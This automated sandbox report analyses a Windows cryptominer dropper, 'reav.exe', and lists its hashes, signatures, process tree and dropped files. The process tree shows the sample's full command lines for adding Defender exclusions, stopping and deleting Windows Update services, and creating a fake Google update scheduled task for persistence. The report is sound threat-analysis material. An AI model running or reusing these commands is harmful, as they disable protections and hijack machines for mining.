Analysis
max time kernel: 301s
max time network: 298s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 23-09-2022 06:18
Behavioral task: behavioral1
Sample: reav.exe
Resource: win7-20220812-en
General
Target: reav.exe
Size: 7.0MB
MD5: 4c7bc4f742346f6f5506660175637a70
SHA1: b1c87e4395474abb15a1c6bf785bee77adfaefa5
SHA256: 0423d0cb6564b1b11ac919f5c8d4de4d6cda4a694cdb9f62d2d44b6009bc506d
SHA512: fdb83490b218672b0ebf32d2e9168d89865efe0373468974d05ed3fe1ac1a22c986f0e75a746da4002db280d03376179805e92b2c2a8700a90c85238231a6b29
SSDEEP: 196608:SIcrtGJOI5qLOKdTn8a9tcpAbe+wOlWd1wUgETPCO67:SIchGlepn8+Ag6wUhPx67
Malware Config
Signatures
Modifies security service 2 TTPs 2 IoCs
Processes: reg.exe
  Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters  (reg.exe)
  Key deleted  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security  (reg.exe)

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes: updater.exe, reav.exe
  Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  (updater.exe)
  Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  (reav.exe)

XMRig Miner payload 2 IoCs
Resources (yara rule xmrig):
  behavioral1/memory/1932-162-0x0000000140000000-0x00000001407F4000-memory.dmp
  behavioral1/memory/1932-166-0x0000000140000000-0x00000001407F4000-memory.dmp

Drops file in Drivers directory 2 IoCs
Processes: reav.exe, updater.exe
  File created  C:\Windows\system32\drivers\etc\hosts  (reav.exe)
  File created  C:\Windows\system32\drivers\etc\hosts  (updater.exe)

Executes dropped EXE 1 IoCs
Processes: updater.exe
  PID 1728  updater.exe

Stops running service(s) 3 TTPs

Resources (yara rule upx):
  behavioral1/memory/1932-162-0x0000000140000000-0x00000001407F4000-memory.dmp
  behavioral1/memory/1932-166-0x0000000140000000-0x00000001407F4000-memory.dmp

Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: reav.exe, updater.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  (reav.exe)
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  (reav.exe)
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  (updater.exe)
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  (updater.exe)

Loads dropped DLL 1 IoCs
Processes: taskeng.exe
  PID 1752  taskeng.exe

Resources (yara rule themida):
  behavioral1/memory/1476-54-0x000000013F4D0000-0x00000001401B9000-memory.dmp
  behavioral1/memory/1476-55-0x000000013F4D0000-0x00000001401B9000-memory.dmp
  behavioral1/memory/1476-57-0x000000013F4D0000-0x00000001401B9000-memory.dmp
  behavioral1/memory/1476-58-0x000000013F4D0000-0x00000001401B9000-memory.dmp
  behavioral1/memory/1476-59-0x000000013F4D0000-0x00000001401B9000-memory.dmp
  behavioral1/memory/1476-60-0x000000013F4D0000-0x00000001401B9000-memory.dmp
  behavioral1/memory/1476-61-0x000000013F4D0000-0x00000001401B9000-memory.dmp
  behavioral1/memory/1476-98-0x000000013F4D0000-0x00000001401B9000-memory.dmp
  \Program Files\Google\Chrome\updater.exe
  C:\Program Files\Google\Chrome\updater.exe
  behavioral1/memory/1728-113-0x000000013FF50000-0x0000000140C39000-memory.dmp
  behavioral1/memory/1728-114-0x000000013FF50000-0x0000000140C39000-memory.dmp
  behavioral1/memory/1728-115-0x000000013FF50000-0x0000000140C39000-memory.dmp
  behavioral1/memory/1728-119-0x000000013FF50000-0x0000000140C39000-memory.dmp
  behavioral1/memory/1728-118-0x000000013FF50000-0x0000000140C39000-memory.dmp
  behavioral1/memory/1728-117-0x000000013FF50000-0x0000000140C39000-memory.dmp
  behavioral1/memory/1728-116-0x000000013FF50000-0x0000000140C39000-memory.dmp
  behavioral1/memory/1728-125-0x000000013FF50000-0x0000000140C39000-memory.dmp
  behavioral1/memory/1728-160-0x000000013FF50000-0x0000000140C39000-memory.dmp
  C:\Program Files\Google\Chrome\updater.exe

Checks whether UAC is enabled
Processes: reav.exe, updater.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  (reav.exe)
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  (updater.exe)

Drops file in System32 directory 2 IoCs
Processes: powershell.exe, powershell.exe
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  (powershell.exe)
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  (powershell.exe)

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes: reav.exe, updater.exe
  PID 1476  reav.exe
  PID 1728  updater.exe

Suspicious use of SetThreadContext 2 IoCs
Processes: updater.exe
  PID 1728 (updater.exe) set thread context of PID 1276 (conhost.exe)
  PID 1728 (updater.exe) set thread context of PID 1932 (conhost.exe)

Drops file in Program Files directory 4 IoCs
Processes: reav.exe, updater.exe, cmd.exe, cmd.exe
  File created  C:\Program Files\Google\Chrome\updater.exe  (reav.exe)
  File created  C:\Program Files\Google\Libs\WR64.sys  (updater.exe)
  File created  C:\Program Files\Google\Libs\g.log  (cmd.exe)
  File created  C:\Program Files\Google\Libs\g.log  (cmd.exe)

Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe (10 instances)
  PID 552  sc.exe
  PID 1508  sc.exe
  PID 912  sc.exe
  PID 2036  sc.exe
  PID 288  sc.exe
  PID 1692  sc.exe
  PID 1488  sc.exe
  PID 2036  sc.exe
  PID 2004  sc.exe
  PID 1468  sc.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.

Modifies data under HKEY_USERS 3 IoCs
Processes: powershell.exe, WMIC.exe
  Key created  \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage  (powershell.exe)
  Set value (data)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d002082425cfd801  (powershell.exe)
  Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  (WMIC.exe)

Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: powershell.exe (5 instances), conhost.exe
  PID 604  powershell.exe
  PID 1816  powershell.exe
  PID 776  powershell.exe
  PID 1328  powershell.exe
  PID 896  powershell.exe
  PID 1932  conhost.exe  (this row is repeated for each of the remaining IoCs, 64 in total)

Suspicious behavior: LoadsDriver 1 IoCs
Processes:
  PID 460

Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes: powershell.exe, powercfg.exe, WMIC.exe, conhost.exe
  Token: SeDebugPrivilege  PID 604  powershell.exe
  Token: SeShutdownPrivilege  PID 1788  powercfg.exe
  Token: SeShutdownPrivilege  PID 1432  powercfg.exe
  Token: SeDebugPrivilege  PID 1816  powershell.exe
  Token: SeShutdownPrivilege  PID 1136  powercfg.exe
  Token: SeShutdownPrivilege  PID 2012  powercfg.exe
  Token: SeDebugPrivilege  PID 776  powershell.exe
  Token: SeDebugPrivilege  PID 1328  powershell.exe
  Token: SeShutdownPrivilege  PID 1528  powercfg.exe
  Token: SeShutdownPrivilege  PID 308  powercfg.exe
  Token: SeDebugPrivilege  PID 896  powershell.exe
  Token: SeShutdownPrivilege  PID 1280  powercfg.exe
  Token: SeShutdownPrivilege  PID 2032  powercfg.exe
  Token: SeAssignPrimaryTokenPrivilege  PID 1840  WMIC.exe
  Token: SeIncreaseQuotaPrivilege  PID 1840  WMIC.exe
  Token: SeSecurityPrivilege  PID 1840  WMIC.exe
  Token: SeTakeOwnershipPrivilege  PID 1840  WMIC.exe
  Token: SeLoadDriverPrivilege  PID 1840  WMIC.exe
  Token: SeSystemtimePrivilege  PID 1840  WMIC.exe
  Token: SeBackupPrivilege  PID 1840  WMIC.exe
  Token: SeRestorePrivilege  PID 1840  WMIC.exe
  Token: SeShutdownPrivilege  PID 1840  WMIC.exe
  Token: SeSystemEnvironmentPrivilege  PID 1840  WMIC.exe
  Token: SeUndockPrivilege  PID 1840  WMIC.exe
  Token: SeManageVolumePrivilege  PID 1840  WMIC.exe
  (the twelve WMIC.exe rows above appear twice in the report)
  Token: SeLockMemoryPrivilege  PID 1932  conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs
Processes: reav.exe, cmd.exe, cmd.exe, powershell.exe, powershell.exe, taskeng.exe
Each row below is listed three times in the report unless noted.
  PID 1476 (reav.exe) wrote to memory of PID 604 (powershell.exe)
  PID 1476 (reav.exe) wrote to memory of PID 1100 (cmd.exe)
  PID 1476 (reav.exe) wrote to memory of PID 1620 (cmd.exe)
  PID 1476 (reav.exe) wrote to memory of PID 1816 (powershell.exe)
  PID 1620 (cmd.exe) wrote to memory of PID 1788 (powercfg.exe)
  PID 1100 (cmd.exe) wrote to memory of PID 552 (sc.exe)
  PID 1100 (cmd.exe) wrote to memory of PID 1508 (sc.exe)
  PID 1620 (cmd.exe) wrote to memory of PID 1432 (powercfg.exe)
  PID 1100 (cmd.exe) wrote to memory of PID 912 (sc.exe)
  PID 1100 (cmd.exe) wrote to memory of PID 2036 (sc.exe)
  PID 1620 (cmd.exe) wrote to memory of PID 1136 (powercfg.exe)
  PID 1620 (cmd.exe) wrote to memory of PID 2012 (powercfg.exe)
  PID 1100 (cmd.exe) wrote to memory of PID 288 (sc.exe)
  PID 1100 (cmd.exe) wrote to memory of PID 1056 (reg.exe)
  PID 1100 (cmd.exe) wrote to memory of PID 2004 (reg.exe)
  PID 1100 (cmd.exe) wrote to memory of PID 952 (reg.exe)
  PID 1100 (cmd.exe) wrote to memory of PID 1724 (reg.exe)
  PID 1100 (cmd.exe) wrote to memory of PID 1468 (reg.exe)
  PID 1816 (powershell.exe) wrote to memory of PID 336 (schtasks.exe)
  PID 1476 (reav.exe) wrote to memory of PID 776 (powershell.exe)
  PID 776 (powershell.exe) wrote to memory of PID 856 (schtasks.exe)
  PID 1752 (taskeng.exe) wrote to memory of PID 1728 (updater.exe)  (listed once)

Processes
Process tree, indented by depth; each entry gives the image path, the command line, and the signatures matched by that process.

[1] C:\Users\Admin\AppData\Local\Temp\reav.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\reav.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Drops file in Drivers directory
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\system32\cmd.exe
      cmd: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\sc.exe
        cmd: sc stop UsoSvc
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        cmd: sc stop WaaSMedicSvc
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        cmd: sc stop wuauserv
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        cmd: sc stop bits
        - Launches sc.exe

    [3] C:\Windows\system32\sc.exe
        cmd: sc stop dosvc
        - Launches sc.exe

    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        - Modifies security service

    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

    [3] C:\Windows\system32\reg.exe
        cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

  [2] C:\Windows\system32\cmd.exe
      cmd: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\powercfg.exe
        cmd: powercfg /x -hibernate-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\powercfg.exe
        cmd: powercfg /x -hibernate-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\powercfg.exe
        cmd: powercfg /x -standby-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\powercfg.exe
        cmd: powercfg /x -standby-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: powershell <#dkguxwryc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\schtasks.exe
        cmd: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
        - Creates scheduled task(s)

  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmd: powershell <#mlvtn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\system32\schtasks.exe
        cmd: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC

[1] C:\Windows\system32\taskeng.exe
    cmd: taskeng.exe {3E707C90-E72A-4641-AA9B-F9FF3437E5D1} S-1-5-18:NT AUTHORITY\System:Service:
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

  [2] C:\Program Files\Google\Chrome\updater.exe
      cmd: "C:\Program Files\Google\Chrome\updater.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Drops file in Drivers directory
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Drops file in Program Files directory

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        - Drops file in System32 directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\cmd.exe
        cmd: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

      [4] C:\Windows\system32\sc.exe
          cmd: sc stop UsoSvc
          - Launches sc.exe

      [4] C:\Windows\system32\sc.exe
          cmd: sc stop WaaSMedicSvc
          - Launches sc.exe

      [4] C:\Windows\system32\sc.exe
          cmd: sc stop wuauserv
          - Launches sc.exe

      [4] C:\Windows\system32\sc.exe
          cmd: sc stop bits
          - Launches sc.exe

      [4] C:\Windows\system32\sc.exe
          cmd: sc stop dosvc
          - Launches sc.exe

      [4] C:\Windows\system32\reg.exe
          cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

      [4] C:\Windows\system32\reg.exe
          cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

      [4] C:\Windows\system32\reg.exe
          cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

      [4] C:\Windows\system32\reg.exe
          cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

      [4] C:\Windows\system32\reg.exe
          cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

    [3] C:\Windows\system32\cmd.exe
        cmd: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

      [4] C:\Windows\system32\powercfg.exe
          cmd: powercfg /x -hibernate-timeout-ac 0
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\system32\powercfg.exe
          cmd: powercfg /x -hibernate-timeout-dc 0
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\system32\powercfg.exe
          cmd: powercfg /x -standby-timeout-ac 0
          - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\system32\powercfg.exe
          cmd: powercfg /x -standby-timeout-dc 0
          - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmd: powershell <#dkguxwryc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      [4] C:\Windows\system32\schtasks.exe
          cmd: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          - Creates scheduled task(s)

    [3] C:\Windows\system32\conhost.exe
        cmd: C:\Windows\system32\conhost.exe hcrjlvsp

      [4] C:\Windows\system32\cmd.exe
          cmd: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          - Drops file in Program Files directory

        [5] C:\Windows\System32\Wbem\WMIC.exe
            cmd: wmic PATH Win32_VideoController GET Name, VideoProcessor
            - Modifies data under HKEY_USERS
            - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\system32\cmd.exe
        cmd: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        - Drops file in Program Files directory

    [3] C:\Windows\system32\conhost.exe
        cmd: C:\Windows\system32\conhost.exe dmxihflldgatbxwx GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1gdioqe8NBSKYuPqRQikB1LSNDCZ707F9ASg+mgAaJFy
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Program Files\Google\Chrome\updater.exe (also recorded as \Program Files\Google\Chrome\updater.exe)
  Filesize: 7.0MB
  MD5: 8ae770bdb0a2d1babcc9642c82fd92a3
  SHA1: 2032658e2249a90f703dedffad238e9cb61c1278
  SHA256: 1626c6d31f4077d2182d332394c491a0a100e7b86d8ebb478138c3fa887f52f4
  SHA512: 26317d7192ff10a8edea46e1bd4f195aa1c2ab94b8d18f6f7d758a93f39aa406f2508ada9259d67edd140dd51e652f4c4b0b26ab36986ae27c441fe7cf72cbad

C:\Program Files\Google\Libs\g.log
  Filesize: 198B
  MD5: 37dd19b2be4fa7635ad6a2f3238c4af1
  SHA1: e5b2c034636b434faee84e82e3bce3a3d3561943
  SHA256: 8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
  SHA512: 86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: bb0a9330b4f8abbacc66864911969952
  SHA1: f0f95b97434b36dff0a968899682c067ba0b7bdc
  SHA256: aee27dd7594b35cda8dc9cc90f916b58b57c46b220a9e62d13cdf5b1a439966f
  SHA512: c4172ac321dfc5720049ddc60495211e32b36cc55a53cbcc482e4737b8b11a11ddd05a48b626205e1bcc1991e8971c74e125a3692bb9c0f0ecb035d5e9876714

C:\Windows\system32\drivers\etc\hosts
  Filesize: 2KB
  MD5: a774fd7a4b22e14cb51baf5273b7c9f2
  SHA1: 9a3dab13bb04a2175953f7aea36de83bfb219695
  SHA256: e2e064f7101eff07df08618ea418f00273219b1af8cce23e0a22f000b2cbd263
  SHA512: a8c14ff733d8982ae2b75ed914c94295ea60ceb9c069479923b6136e817c1f33c791dacde98636f04d0c0aecff5c31e8f7423f9e8a69578e072e49d0bdc86e8c